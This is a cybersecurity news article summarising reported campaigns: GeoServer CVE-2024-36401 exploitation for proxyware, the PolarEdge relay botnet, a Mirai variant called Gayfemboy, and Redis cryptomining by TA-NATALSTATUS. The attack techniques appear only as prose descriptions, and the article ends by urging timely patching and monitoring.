Cybersecurity analysts report that multiple attack campaigns are now exploiting exposed servers and unpatched software flaws. The intrusions have been used to assemble botnets, run covert cryptocurrency mining operations, and repurpose ordinary devices as traffic relays for criminal networks. According to researchers, this wave of activity points to a change in strategy: instead of short bursts of disruption, attackers are concentrating on methods that allow them to stay hidden and draw income over longer periods.
At the center of the warning is CVE-2024-36401, a severe remote code execution flaw in OSGeo GeoServer’s GeoTools library, rated at the highest criticality level. According to Palo Alto Networks’ Unit 42, this vulnerability has been actively weaponized since late last year. Attackers are exploiting exposed GeoServer instances to quietly install modified applications and executables that turn compromised systems into bandwidth-sharing tools or residential proxies, generating illicit passive income. Instead of deploying noisy malware, these campaigns mimic legitimate monetization strategies used by app developers, making them far harder to detect.
Researchers at Palo Alto Networks’ Unit 42 say the flaw has been in use by attackers since late last year. Evidence shows that exposed GeoServer systems are being targeted to drop altered applications, which then repurpose the machines as bandwidth-sharing services or residential proxies, creating a discreet source of revenue for the operators.
Researchers at the internet intelligence company Censys have also identified a botnet known as PolarEdge, which has been spreading by exploiting long-unpatched flaws in everyday hardware. The network includes tens of thousands of compromised devices, routers, security cameras and even enterprise firewalls, with the bulk of infections traced to South Korea, the United States, Hong Kong, Sweden and Canada. Evidence suggests PolarEdge has been active since the middle of last year. Analysts say the botnet behaves like an “operational relay,” allowing hijacked systems to pass traffic on behalf of attackers while continuing to work normally, a trait that makes the activity hard for owners or providers to detect.
Another campaign drawing attention is a modified Mirai botnet strain known as Gayfemboy. It has been observed targeting devices from vendors including Cisco, TP-Link and DrayTek. This version does more than recycle Mirai’s original code. It has been reworked with features that allow it to remain on systems for longer and to sidestep common detection tools. Those changes give it the ability to launch disruptive DDoS attacks while keeping a lower profile than the older strains that defenders are more familiar with.
Investigators have also linked a campaign to a group tracked as TA-NATALSTATUS, which is abusing unsecured Redis servers for cryptocurrency mining. The attackers begin by scanning for open ports and then create malicious cron jobs using standard commands. Once inside, they shut down competing processes, block outside connections to the Redis port, and disguise their activity by renaming common system tools so that administrators see nothing unusual when checking processes.
Security experts say this reflects a broader shift in cybercrime. Instead of aiming for quick disruption, adversaries are embedding themselves inside everyday infrastructure, quietly drawing on bandwidth and processing power for long-term profit. Because the activity blends with routine network traffic, organizations often remain unaware until substantial resources have already been drained. Experts caution that without timely patching and close monitoring, companies risk having their systems silently absorbed into global criminal operations.
Caught feelings for cybersecurity? It’s okay, it happens. Follow us on LinkedIn and Instagram to keep the spark alive.
